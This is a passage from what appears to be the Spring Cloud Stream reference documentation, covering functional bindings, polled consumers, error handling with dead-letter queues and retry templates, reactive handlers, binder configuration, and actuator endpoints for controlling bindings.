applications to support Source, Processor and Sink.\n\nHere is the example of a Source application defined as `java.util.function.Supplier`\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Source.class)\npublic static class SourceFromSupplier {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SourceFromSupplier.class, \"--spring.cloud.stream.function.definition=date\");\n\t}\n\t@Bean\n\tpublic Supplier<Date> date() {\n\t\treturn () -> new Date(12345L);\n\t}\n}\n----\n\nHere is the example of a Processor application defined as `java.util.function.Function`\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic static class ProcessorFromFunction {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(ProcessorFromFunction.class, \"--spring.cloud.stream.function.definition=toUpperCase\");\n\t}\n\t@Bean\n\tpublic Function<String, String> toUpperCase() {\n\t\treturn s -> s.toUpperCase();\n\t}\n}\n----\n\nHere is the example of a Sink application defined as `java.util.function.Consumer`\n[source,java]\n----\n@EnableAutoConfiguration\n@EnableBinding(Sink.class)\npublic static class SinkFromConsumer {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SinkFromConsumer.class, \"--spring.cloud.stream.function.definition=sink\");\n\t}\n\t@Bean\n\tpublic Consumer<String> sink() {\n\t\treturn System.out::println;\n\t}\n}\n----\n\n===== Functional Composition\n\nUsing this programming model you can also benefit from functional composition where you can dynamically compose complex handlers from a set of simple functions.\nAs an example let's add the following function bean to the application defined above\n[source,java]\n----\n@Bean\npublic Function<String, String> wrapInQuotes() {\n\treturn s -> \"\\\"\" + s + \"\\\"\";\n}\n----\nand modify the `spring.cloud.stream.function.definition` property to reflect your intention to compose a new function from both \u2018toUpperCase\u2019 and \u2018wrapInQuotes\u2019.\nTo do that Spring Cloud Function allows you to use `|` (pipe) symbol. So to finish our example our property will now look like this:\n\n[source,java]\n----\n\u2014spring.cloud.stream.function.definition=toUpperCase|wrapInQuotes\n----\n\n\n\n[[spring-cloud-streams-overview-using-polled-consumers]]\n==== Using Polled Consumers\n\n===== Overview\n\nWhen using polled consumers, you poll the `PollableMessageSource` on demand.\nConsider the following example of a polled consumer:\n\n[source,java]\n----\npublic interface PolledConsumer {\n\n @Input\n PollableMessageSource destIn();\n\n @Output\n MessageChannel destOut();\n\n}\n----\n\nGiven the polled consumer in the preceding example, you might use it as follows:\n\n[source,java]\n----\n@Bean\npublic ApplicationRunner poller(PollableMessageSource destIn, MessageChannel destOut) {\n return args -> {\n while (someCondition()) {\n try {\n if (!destIn.poll(m -> {\n String newPayload = ((String) m.getPayload()).toUpperCase();\n destOut.send(new GenericMessage<>(newPayload));\n })) {\n Thread.sleep(1000);\n }\n }\n catch (Exception e) {\n \/\/ handle failure\n }\n }\n };\n}\n----\n\nThe `PollableMessageSource.poll()` method takes a `MessageHandler` argument (often a lambda expression, as shown here).\nIt returns `true` if the message was received and successfully processed.\n\nAs with message-driven consumers, if the `MessageHandler` throws an exception, messages are published to error channels, as discussed in \"`<<binder-error-channels>>`\".\n\nNormally, the `poll()` method acknowledges the message when the `MessageHandler` exits.\nIf the method exits abnormally, the message is rejected (not re-queued), but see <<polled-errors>>.\nYou can override that behavior by taking responsibility for the acknowledgment, as shown in the following example:\n\n[source,java]\n----\n@Bean\npublic ApplicationRunner poller(PollableMessageSource dest1In, MessageChannel dest2Out) {\n return args -> {\n while (someCondition()) {\n if (!dest1In.poll(m -> {\n StaticMessageHeaderAccessor.getAcknowledgmentCallback(m).noAutoAck();\n \/\/ e.g. hand off to another thread which can perform the ack\n \/\/ or acknowledge(Status.REQUEUE)\n\n })) {\n Thread.sleep(1000);\n }\n }\n };\n}\n----\n\nIMPORTANT: You must `ack` (or `nack`) the message at some point, to avoid resource leaks.\n\nIMPORTANT: Some messaging systems (such as Apache Kafka) maintain a simple offset in a log. If a delivery fails and is re-queued with `StaticMessageHeaderAccessor.getAcknowledgmentCallback(m).acknowledge(Status.REQUEUE);`, any later successfully ack'd messages are redelivered.\n\nThere is also an overloaded `poll` method, for which the definition is as follows:\n\n[source,java]\n----\npoll(MessageHandler handler, ParameterizedTypeReference<?> type)\n----\n\nThe `type` is a conversion hint that allows the incoming message payload to be converted, as shown in the following example:\n\n[source,java]\n----\nboolean result = pollableSource.poll(received -> {\n\t\t\tMap<String, Foo> payload = (Map<String, Foo>) received.getPayload();\n ...\n\n\t\t}, new ParameterizedTypeReference<Map<String, Foo>>() {});\n----\n\n[[polled-errors]]\n===== Handling Errors\n\nBy default, an error channel is configured for the pollable source; if the callback throws an exception, an `ErrorMessage` is sent to the error channel (`<destination>.<group>.errors`); this error channel is also bridged to the global Spring Integration `errorChannel`.\n\nYou can subscribe to either error channel with a `@ServiceActivator` to handle errors; without a subscription, the error will simply be logged and the message will be acknowledged as successful.\nIf the error channel service activator throws an exception, the message will be rejected (by default) and won't be redelivered.\nIf the service activator throws a `RequeueCurrentMessageException`, the message will be requeued at the broker and will be again retrieved on a subsequent poll.\n\nIf the listener throws a `RequeueCurrentMessageException` directly, the message will be requeued, as discussed above, and will not be sent to the error channels.\n\n[[spring-cloud-stream-overview-error-handling]]\n=== Error Handling\n\nErrors happen, and Spring Cloud Stream provides several flexible mechanisms to handle them.\nThe error handling comes in two flavors:\n\n * *application:* The error handling is done within the application (custom error handler).\n\n * *system:* The error handling is delegated to the binder (re-queue, DL, and others). Note that the techniques are dependent on binder implementation and the\n capability of the underlying messaging middleware.\n\nSpring Cloud Stream uses the https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] library to facilitate successful message processing. See <<Retry Template>> for more details.\nHowever, when all fails, the exceptions thrown by the message handlers are propagated back to the binder. At that point, binder invokes custom error handler or communicates\nthe error back to the messaging system (re-queue, DLQ, and others).\n\n==== Application Error Handling\n\nThere are two types of application-level error handling. Errors can be handled at each binding subscription or a global handler can handle all the binding subscription errors. Let's review the details.\n\n.A Spring Cloud Stream Sink Application with Custom and Global Error Handlers\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/custom_vs_global_error_channels.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nFor each input binding, Spring Cloud Stream creates a dedicated error channel with the following semantics `<destinationName>.errors`.\n\nNOTE: The `<destinationName>` consists of the name of the binding (such as `input`) and the name of the group (such as `myGroup`).\n\nConsider the following:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.group=myGroup\n----\n\n[source,java]\n----\n@StreamListener(Sink.INPUT) \/\/ destination name 'input.myGroup'\npublic void handle(Person value) {\n\tthrow new RuntimeException(\"BOOM!\");\n}\n\n@ServiceActivator(inputChannel = Processor.INPUT + \".myGroup.errors\") \/\/channel name 'input.myGroup.errors'\npublic void error(Message<?> message) {\n\tSystem.out.println(\"Handling ERROR: \" + message);\n}\n----\n\nIn the preceding example the destination name is `input.myGroup` and the dedicated error channel name is `input.myGroup.errors`.\n\nNOTE: The use of @StreamListener annotation is intended specifically to define bindings that bridge internal channels and external destinations. Given that the destination\nspecific error channel does NOT have an associated external destination, such channel is a prerogative of Spring Integration (SI). This means that the handler\nfor such destination must be defined using one of the SI handler annotations (i.e., @ServiceActivator, @Transformer etc.).\n\nNOTE: If `group` is not specified anonymous group is used (something like `input.anonymous.2K37rb06Q6m2r51-SPIDDQ`), which is not suitable for error\nhandling scenarious, since you don't know what it's going to be until the destination is created.\n\nAlso, in the event you are binding to the existing destination such as:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.destination=myFooDestination\nspring.cloud.stream.bindings.input.group=myGroup\n----\n\nthe full destination name is `myFooDestination.myGroup` and then the dedicated error channel name is `myFooDestination.myGroup.errors`.\n\nBack to the example...\n\nThe `handle(..)` method, which subscribes to the channel named `input`, throws an exception. Given there is also a subscriber to the error channel `input.myGroup.errors`\nall error messages are handled by this subscriber.\n\nIf you have multiple bindings, you may want to have a single error handler. Spring Cloud Stream automatically provides support for\na _global error channel_ by bridging each individual error channel to the channel named `errorChannel`, allowing a single subscriber to handle all errors,\nas shown in the following example:\n\n[source,java]\n----\n@StreamListener(\"errorChannel\")\npublic void error(Message<?> message) {\n\tSystem.out.println(\"Handling ERROR: \" + message);\n}\n----\n\nThis may be a convenient option if error handling logic is the same regardless of which handler produced the error.\n\n==== System Error Handling\n\nSystem-level error handling implies that the errors are communicated back to the messaging system and, given that not every messaging system\nis the same, the capabilities may differ from binder to binder.\n\nThat said, in this section we explain the general idea behind system level error handling and use Rabbit binder as an example. NOTE: Kafka binder provides similar\nsupport, although some configuration properties do differ. Also, for more details and configuration options, see the individual binder's documentation.\n\nIf no internal error handlers are configured, the errors propagate to the binders, and the binders subsequently propagate those errors back to the messaging system.\nDepending on the capabilities of the messaging system such a system may _drop_ the message, _re-queue_ the message for re-processing or _send the failed message to DLQ_.\nBoth Rabbit and Kafka support these concepts. However, other binders may not, so refer to your individual binder\u2019s documentation for details on supported system-level\nerror-handling options.\n\n===== Drop Failed Messages\n\nBy default, if no additional system-level configuration is provided, the messaging system drops the failed message.\nWhile acceptable in some cases, for most cases, it is not, and we need some recovery mechanism to avoid message loss.\n\n===== DLQ - Dead Letter Queue\n\nDLQ allows failed messages to be sent to a special destination: - _Dead Letter Queue_.\n\nWhen configured, failed messages are sent to this destination for subsequent re-processing or auditing and reconciliation.\n\nFor example, continuing on the previous example and to set up the DLQ with Rabbit binder, you need to set the following property:\n\n[source,text]\n----\nspring.cloud.stream.rabbit.bindings.input.consumer.auto-bind-dlq=true\n----\n\nKeep in mind that, in the above property, `input` corresponds to the name of the input destination binding.\nThe `consumer` indicates that it is a consumer property and `auto-bind-dlq` instructs the binder to configure DLQ for `input`\ndestination, which results in an additional Rabbit queue named `input.myGroup.dlq`.\n\nOnce configured, all failed messages are routed to this queue with an error message similar to the following:\n\n[source,text]\n----\ndelivery_mode:\t1\nheaders:\nx-death:\ncount:\t1\nreason:\trejected\nqueue:\tinput.hello\ntime:\t1522328151\nexchange:\nrouting-keys:\tinput.myGroup\nPayload {\"name\u201d:\"Bob\"}\n----\n\nAs you can see from the above, your original message is preserved for further actions.\n\nHowever, one thing you may have noticed is that there is limited information on the original issue with the message processing. For example, you do not see a stack\ntrace corresponding to the original error.\nTo get more relevant information about the original error, you must set an additional property:\n\n[source,text]\n----\nspring.cloud.stream.rabbit.bindings.input.consumer.republish-to-dlq=true\n----\n\nDoing so forces the internal error handler to intercept the error message and add additional information to it before publishing it to DLQ.\nOnce configured, you can see that the error message contains more information relevant to the original error, as follows:\n\n[source,text]\n----\ndelivery_mode:\t2\nheaders:\nx-original-exchange:\nx-exception-message:\thas an error\nx-original-routingKey:\tinput.myGroup\nx-exception-stacktrace:\torg.springframework.messaging.MessageHandlingException: nested exception is\n org.springframework.messaging.MessagingException: has an error, failedMessage=GenericMessage [payload=byte[15],\n headers={amqp_receivedDeliveryMode=NON_PERSISTENT, amqp_receivedRoutingKey=input.hello, amqp_deliveryTag=1,\n deliveryAttempt=3, amqp_consumerQueue=input.hello, amqp_redelivered=false, id=a15231e6-3f80-677b-5ad7-d4b1e61e486e,\n amqp_consumerTag=amq.ctag-skBFapilvtZhDsn0k3ZmQg, contentType=application\/json, timestamp=1522327846136}]\n at org.spring...integ...han...MethodInvokingMessageProcessor.processMessage(MethodInvokingMessageProcessor.java:107)\n at. . . . .\nPayload {\"name\u201d:\"Bob\"}\n----\n\nThis effectively combines application-level and system-level error handling to further assist with downstream troubleshooting mechanics.\n\n===== Re-queue Failed Messages\n\nAs mentioned earlier, the currently supported binders (Rabbit and Kafka) rely on `RetryTemplate` to facilitate successful message processing. See <<Retry Template>> for details.\nHowever, for cases when `max-attempts` property is set to 1, internal reprocessing of the message is disabled. At this point, you can facilitate message re-processing (re-tries)\nby instructing the messaging system to re-queue the failed message. Once re-queued, the failed message is sent back to the original handler, essentially creating a retry loop.\n\nThis option may be feasible for cases where the nature of the error is related to some sporadic yet short-term unavailability of some resource.\n\nTo accomplish that, you must set the following properties:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.consumer.max-attempts=1\nspring.cloud.stream.rabbit.bindings.input.consumer.requeue-rejected=true\n----\n\nIn the preceding example, the `max-attempts` set to 1 essentially disabling internal re-tries and `requeue-rejected` (short for _requeue rejected messages_) is set to `true`.\nOnce set, the failed message is resubmitted to the same handler and loops continuously or until the handler throws `AmqpRejectAndDontRequeueException`\nessentially allowing you to build your own re-try logic within the handler itself.\n\n==== Retry Template\n\nThe `RetryTemplate` is part of the https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] library.\nWhile it is out of scope of this document to cover all of the capabilities of the `RetryTemplate`, we will mention the following consumer properties that are specifically related to\nthe `RetryTemplate`:\n\nmaxAttempts::\nThe number of attempts to process the message.\n+\nDefault: 3.\nbackOffInitialInterval::\nThe backoff initial interval on retry.\n+\nDefault 1000 milliseconds.\nbackOffMaxInterval::\nThe maximum backoff interval.\n+\nDefault 10000 milliseconds.\nbackOffMultiplier::\nThe backoff multiplier.\n+\nDefault 2.0.\ndefaultRetryable::\nWhether exceptions thrown by the listener that are not listed in the `retryableExceptions` are retryable.\n+\nDefault: `true`.\nretryableExceptions::\nA map of Throwable class names in the key and a boolean in the value.\nSpecify those exceptions (and subclasses) that will or won't be retried.\nAlso see `defaultRetriable`.\nExample: `spring.cloud.stream.bindings.input.consumer.retryable-exceptions.java.lang.IllegalStateException=false`.\n+\nDefault: empty.\n\nWhile the preceding settings are sufficient for majority of the customization requirements, they may not satisfy certain complex requirements at, which\npoint you may want to provide your own instance of the `RetryTemplate`. To do so configure it as a bean in your application configuration. The application provided\ninstance will override the one provided by the framework. Also, to avoid conflicts you must qualify the instance of the `RetryTemplate` you want to be used by the binder\nas `@StreamRetryTemplate`. For example,\n\n[source,java]\n----\n@StreamRetryTemplate\npublic RetryTemplate myRetryTemplate() {\n return new RetryTemplate();\n}\n----\nAs you can see from the above example you don't need to annotate it with `@Bean` since `@StreamRetryTemplate` is a qualified `@Bean`.\n\n[[spring-cloud-stream-overview-reactive-programming-support]]\n=== Reactive Programming Support\n\nSpring Cloud Stream also supports the use of reactive APIs where incoming and outgoing data is handled as continuous data flows.\nSupport for reactive APIs is available through `spring-cloud-stream-reactive`, which needs to be added explicitly to your project.\n\nThe programming model with reactive APIs is declarative. Instead of specifying how each individual message should be handled, you can use operators that describe functional transformations from inbound to outbound data flows.\n\nAt present Spring Cloud Stream supports the only the https:\/\/projectreactor.io\/[Reactor API].\nIn the future, we intend to support a more generic model based on Reactive Streams.\n\nThe reactive programming model also uses the `@StreamListener` annotation for setting up reactive handlers.\nThe differences are that:\n\n* The `@StreamListener` annotation must not specify an input or output, as they are provided as arguments and return values from the method.\n* The arguments of the method must be annotated with `@Input` and `@Output`, indicating which input or output the incoming and outgoing data flows connect to, respectively.\n* The return value of the method, if any, is annotated with `@Output`, indicating the input where data should be sent.\n\nNOTE: Reactive programming support requires Java 1.8.\n\nNOTE: As of Spring Cloud Stream 1.1.1 and later (starting with release train Brooklyn.SR2), reactive programming support requires the use of Reactor 3.0.4.RELEASE and higher.\nEarlier Reactor versions (including 3.0.1.RELEASE, 3.0.2.RELEASE and 3.0.3.RELEASE) are not supported.\n`spring-cloud-stream-reactive` transitively retrieves the proper version, but it is possible for the project structure to manage the version of the `io.projectreactor:reactor-core` to an earlier release, especially when using Maven.\nThis is the case for projects generated by using Spring Initializr with Spring Boot 1.x, which overrides the Reactor version to `2.0.8.RELEASE`.\nIn such cases, you must ensure that the proper version of the artifact is released.\nYou can do so by adding a direct dependency on `io.projectreactor:reactor-core` with a version of `3.0.4.RELEASE` or later to your project.\n\nNOTE: The use of term, \"`reactive`\", currently refers to the reactive APIs being used and not to the execution model being reactive (that is, the bound endpoints still use a 'push' rather than a 'pull' model). While some backpressure support is provided by the use of Reactor, we do intend, in a future release, to support entirely reactive pipelines by the use of native reactive clients for the connected middleware.\n\n===== Reactor-based Handlers\n\nA Reactor-based handler can have the following argument types:\n\n* For arguments annotated with `@Input`, it supports the Reactor `Flux` type.\nThe parameterization of the inbound Flux follows the same rules as in the case of individual message handling: It can be the entire `Message`, a POJO that can be the `Message` payload, or a POJO that is the result of a transformation based on the `Message` content-type header. Multiple inputs are provided.\n* For arguments annotated with `Output`, it supports the `FluxSender` type, which connects a `Flux` produced by the method with an output. Generally speaking, specifying outputs as arguments is only recommended when the method can have multiple outputs.\n\nA Reactor-based handler supports a return type of `Flux`. In that case, it must be annotated with `@Output`. We recommend using the return value of the method when a single output `Flux` is available.\n\nThe following example shows a Reactor-based `Processor`:\n\n[source, java]\n----\n@EnableBinding(Processor.class)\n@EnableAutoConfiguration\npublic static class UppercaseTransformer {\n\n @StreamListener\n @Output(Processor.OUTPUT)\n public Flux<String> receive(@Input(Processor.INPUT) Flux<String> input) {\n return input.map(s -> s.toUpperCase());\n }\n}\n----\n\nThe same processor using output arguments looks like the following example:\n\n[source, java]\n----\n@EnableBinding(Processor.class)\n@EnableAutoConfiguration\npublic static class UppercaseTransformer {\n\n @StreamListener\n public void receive(@Input(Processor.INPUT) Flux<String> input,\n @Output(Processor.OUTPUT) FluxSender output) {\n output.send(input.map(s -> s.toUpperCase()));\n }\n}\n----\n\n===== Reactive Sources\n\nSpring Cloud Stream reactive support also provides the ability for creating reactive sources through the `@StreamEmitter` annotation.\nBy using the `@StreamEmitter` annotation, a regular source may be converted to a reactive one.\n`@StreamEmitter` is a method level annotation that marks a method to be an emitter to outputs declared with `@EnableBinding`.\nYou cannot use the `@Input` annotation along with `@StreamEmitter`, as the methods marked with this annotation are not listening for any input. Rather, methods marked with `@StreamEmitter` generate output.\nFollowing the same programming model used in `@StreamListener`, `@StreamEmitter` also allows flexible ways of using the `@Output` annotation, depending on whether the method has any arguments, a return type, and other considerations.\n\nThe remainder of this section contains examples of using the `@StreamEmitter` annotation in various styles.\n\nThe following example emits the `Hello, World` message every millisecond and publishes to a Reactor `Flux`:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n public Flux<String> emit() {\n return Flux.intervalMillis(1)\n .map(l -> \"Hello World\");\n }\n}\n----\n\nIn the preceding example, the resulting messages in the `Flux` are sent to the output channel of the `Source`.\n\nThe next example is another flavor of an `@StreamEmmitter` that sends a Reactor `Flux`.\nInstead of returning a `Flux`, the following method uses a `FluxSender` to programmatically send a `Flux` from a source:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n public void emit(FluxSender output) {\n output.send(Flux.intervalMillis(1)\n .map(l -> \"Hello World\"));\n }\n}\n----\n\nThe next example is exactly same as the above snippet in functionality and style.\nHowever, instead of using an explicit `@Output` annotation on the method, it uses the annotation on the method parameter.\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n public void emit(@Output(Source.OUTPUT) FluxSender output) {\n output.send(Flux.intervalMillis(1)\n .map(l -> \"Hello World\"));\n }\n}\n----\n\nThe last example in this section is yet another flavor of writing reacting sources by using the Reactive Streams Publisher API and taking advantage of the support for it in https:\/\/github.com\/spring-projects\/spring-integration-java-dsl\/wiki\/Spring-Integration-Java-DSL-Reference[Spring Integration Java DSL].\nThe `Publisher` in the following example still uses Reactor `Flux` under the hood, but, from an application perspective, that is transparent to the user and only needs Reactive Streams and Java DSL for Spring Integration:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n @Bean\n public Publisher<Message<String>> emit() {\n return IntegrationFlows.from(() ->\n new GenericMessage<>(\"Hello World\"),\n e -> e.poller(p -> p.fixedDelay(1)))\n .toReactivePublisher();\n }\n}\n----\n\n[[spring-cloud-stream-overview-binders]]\n== Binders\n\nSpring Cloud Stream provides a Binder abstraction for use in connecting to physical destinations at the external middleware.\nThis section provides information about the main concepts behind the Binder SPI, its main components, and implementation-specific details.\n\n=== Producers and Consumers\n\nThe following image shows the general relationship of producers and consumers:\n\n.Producers and Consumers\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/producers-consumers.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nA producer is any component that sends messages to a channel.\nThe channel can be bound to an external message broker with a `Binder` implementation for that broker.\nWhen invoking the `bindProducer()` method, the first parameter is the name of the destination within the broker, the second parameter is the local channel instance to which the producer sends messages, and the third parameter contains properties (such as a partition key expression) to be used within the adapter that is created for that channel.\n\nA consumer is any component that receives messages from a channel.\nAs with a producer, the consumer's channel can be bound to an external message broker.\nWhen invoking the `bindConsumer()` method, the first parameter is the destination name, and a second parameter provides the name of a logical group of consumers.\nEach group that is represented by consumer bindings for a given destination receives a copy of each message that a producer sends to that destination (that is, it follows normal publish-subscribe semantics).\nIf there are multiple consumer instances bound with the same group name, then messages are load-balanced across those consumer instances so that each message sent by a producer is consumed by only a single consumer instance within each group (that is, it follows normal queueing semantics).\n\n[[spring-cloud-stream-overview-binder-api]]\n=== Binder SPI\n\nThe Binder SPI consists of a number of interfaces, out-of-the box utility classes, and discovery strategies that provide a pluggable mechanism for connecting to external middleware.\n\nThe key point of the SPI is the `Binder` interface, which is a strategy for connecting inputs and outputs to external middleware. The following listing shows the definnition of the `Binder` interface:\n\n[source,java]\n----\npublic interface Binder<T, C extends ConsumerProperties, P extends ProducerProperties> {\n Binding<T> bindConsumer(String name, String group, T inboundBindTarget, C consumerProperties);\n\n Binding<T> bindProducer(String name, T outboundBindTarget, P producerProperties);\n}\n----\n\nThe interface is parameterized, offering a number of extension points:\n\n* Input and output bind targets. As of version 1.0, only `MessageChannel` is supported, but this is intended to be used as an extension point in the future.\n* Extended consumer and producer properties, allowing specific Binder implementations to add supplemental properties that can be supported in a type-safe manner.\n\nA typical binder implementation consists of the following:\n\n* A class that implements the `Binder` interface;\n* A Spring `@Configuration` class that creates a bean of type `Binder` along with the middleware connection infrastructure.\n* A `META-INF\/spring.binders` file found on the classpath containing one or more binder definitions, as shown in the following example:\n+\n[source]\n----\nkafka:\\\norg.springframework.cloud.stream.binder.kafka.config.KafkaBinderConfiguration\n----\n\n=== Binder Detection\n\nSpring Cloud Stream relies on implementations of the Binder SPI to perform the task of connecting channels to message brokers.\nEach Binder implementation typically connects to one type of messaging system.\n\n==== Classpath Detection\n\nBy default, Spring Cloud Stream relies on Spring Boot's auto-configuration to configure the binding process.\nIf a single Binder implementation is found on the classpath, Spring Cloud Stream automatically uses it.\nFor example, a Spring Cloud Stream project that aims to bind only to RabbitMQ can add the following dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-binder-rabbit<\/artifactId>\n<\/dependency>\n----\n\nFor the specific Maven coordinates of other binder dependencies, see the documentation of that binder implementation.\n\n[[multiple-binders]]\n=== Multiple Binders on the Classpath\n\nWhen multiple binders are present on the classpath, the application must indicate which binder is to be used for each channel binding.\nEach binder configuration contains a `META-INF\/spring.binders` file, which is a simple properties file, as shown in the following example:\n\n[source]\n----\nrabbit:\\\norg.springframework.cloud.stream.binder.rabbit.config.RabbitServiceAutoConfiguration\n----\n\nSimilar files exist for the other provided binder implementations (such as Kafka), and custom binder implementations are expected to provide them as well.\nThe key represents an identifying name for the binder implementation, whereas the value is a comma-separated list of configuration classes that each contain one and only one bean definition of type `org.springframework.cloud.stream.binder.Binder`.\n\nBinder selection can either be performed globally, using the `spring.cloud.stream.defaultBinder` property (for example, `spring.cloud.stream.defaultBinder=rabbit`) or individually, by configuring the binder on each channel binding.\nFor instance, a processor application (that has channels named `input` and `output` for read and write respectively) that reads from Kafka and writes to RabbitMQ can specify the following configuration:\n\n[source]\n----\nspring.cloud.stream.bindings.input.binder=kafka\nspring.cloud.stream.bindings.output.binder=rabbit\n----\n\n[[multiple-systems]]\n=== Connecting to Multiple Systems\n\nBy default, binders share the application's Spring Boot auto-configuration, so that one instance of each binder found on the classpath is created.\nIf your application should connect to more than one broker of the same type, you can specify multiple binder configurations, each with different environment settings.\n\nNOTE: Turning on explicit binder configuration disables the default binder configuration process altogether.\nIf you do so, all binders in use must be included in the configuration.\nFrameworks that intend to use Spring Cloud Stream transparently may create binder configurations that can be referenced by name, but they do not affect the default binder configuration.\nIn order to do so, a binder configuration may have its `defaultCandidate` flag set to false (for example, `spring.cloud.stream.binders.<configurationName>.defaultCandidate=false`).\nThis denotes a configuration that exists independently of the default binder configuration process.\n\nThe following example shows a typical configuration for a processor application that connects to two RabbitMQ broker instances:\n\n[source,yml]\n----\nspring:\n cloud:\n stream:\n bindings:\n input:\n destination: thing1\n binder: rabbit1\n output:\n destination: thing2\n binder: rabbit2\n binders:\n rabbit1:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host1>\n rabbit2:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host2>\n----\n\n=== Binding visualization and control\nSince version 2.0, Spring Cloud Stream supports visualization and control of the Bindings through Actuator endpoints.\n\nStarting with version 2.0 actuator and web are optional, you must first add one of the web dependencies as well as add the actuator dependency manually.\nThe following example shows how to add the dependency for the Web framework:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-web<\/artifactId>\n<\/dependency>\n----\n\nThe following example shows how to add the dependency for the WebFlux framework:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-webflux<\/artifactId>\n<\/dependency>\n----\n\nYou can add the Actuator dependency as follows:\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-actuator<\/artifactId>\n<\/dependency>\n----\n\nNOTE: To run Spring Cloud Stream 2.0 apps in Cloud Foundry, you must add `spring-boot-starter-web` and `spring-boot-starter-actuator` to the classpath. Otherwise, the\napplication will not start due to health check failures.\n\nYou must also enable the `bindings` actuator endpoints by setting the following property: `--management.endpoints.web.exposure.include=bindings`.\n\nOnce those prerequisites are satisfied. you should see the following in the logs when application start:\n\n\t: Mapped \"{[\/actuator\/bindings\/{name}],methods=[POST]. . .\n\t: Mapped \"{[\/actuator\/bindings],methods=[GET]. . .\n\t: Mapped \"{[\/actuator\/bindings\/{name}],methods=[GET]. . .\n\nTo visualize the current bindings, access the following URL:\n`http:\/\/<host>:<port>\/actuator\/bindings`\n\nAlternative, to see a single binding, access one of the URLs similar to the following:\n`http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName`\n\nYou can also stop, start, pause, and resume individual bindings by posting to the same URL while providing a `state` argument as JSON, as shown in the following examples:\n\ncurl -d '{\"state\":\"STOPPED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"STARTED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"PAUSED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"RESUMED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\n\nNOTE: `PAUSED` and `RESUMED` work only when the corresponding binder and its underlying technology supports it. Otherwise, you see the warning message in the logs.\nCurrently, only Kafka binder supports the `PAUSED` and `RESUMED` states.\n\n=== Binder Configuration Properties\n\nThe following properties are available when customizing binder configurations. These properties exposed via `org.springframework.cloud.stream.config.BinderProperties`\n\nThey must be prefixed with `spring.cloud.stream.binders.<configurationName>`.\n\ntype::\nThe binder type.\nIt typically references one of the binders found on the classpath -- in particular, a key in a `META-INF\/spring.binders` file.\n+\nBy default, it has the same value as the configuration name.\ninheritEnvironment::\nWhether the configuration inherits the environment of the application itself.\n+\nDefault: `true`.\nenvironment::\nRoot for a set of properties that can be used to customize the environment of the binder.\nWhen this property is set, the context in which the binder is being created is not a child of the application context.\nThis setting allows for complete separation between the binder components and the application components.\n+\nDefault: `empty`.\ndefaultCandidate::\nWhether the binder configuration is a candidate for being considered a default binder or can be used only when explicitly referenced.\nThis setting allows adding binder configurations without interfering with the default processing.\n+\nDefault: `true`.\n\n== Configuration Options\n\nSpring Cloud Stream supports general configuration options as well as configuration for bindings and binders.\nSome binders let additional binding properties support middleware-specific features.\n\nConfiguration options can be provided to Spring Cloud Stream applications through any mechanism supported by Spring Boot.\nThis includes application arguments, environment variables, and YAML or .properties files.\n\n=== Binding Service Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.config.BindingServiceProperties`\n\nspring.cloud.stream.instanceCount::\nThe number of deployed instances of an application.\nMust be set for partitioning on the producer side. Must be set on the consumer side when using RabbitMQ and with Kafka if `autoRebalanceEnabled=false`.\n+\nDefault: `1`.\n\nspring.cloud.stream.instanceIndex::\nThe instance index of the application: A number from `0` to `instanceCount - 1`.\nUsed for partitioning with RabbitMQ and with Kafka if `autoRebalanceEnabled=false`.\nAutomatically set in Cloud Foundry to match the application's instance index.\n\nspring.cloud.stream.dynamicDestinations::\nA list of destinations that can be bound dynamically (for example, in a dynamic routing scenario).\nIf set, only listed destinations can be bound.\n+\nDefault: empty (letting any destination be bound).\n\nspring.cloud.stream.defaultBinder::\nThe default binder to use, if multiple binders are configured.\nSee <<multiple-binders,Multiple Binders on the Classpath>>.\n+\nDefault: empty.\n\nspring.cloud.stream.overrideCloudConnectors::\nThis property is only applicable when the `cloud` profile is active and Spring Cloud Connectors are provided with the application.\nIf the property is `false` (the default), the binder detects a suitable bound service (for example, a RabbitMQ service bound in Cloud Foundry for the RabbitMQ binder) and uses it for creating connections (usually through Spring Cloud Connectors).\nWhen set to 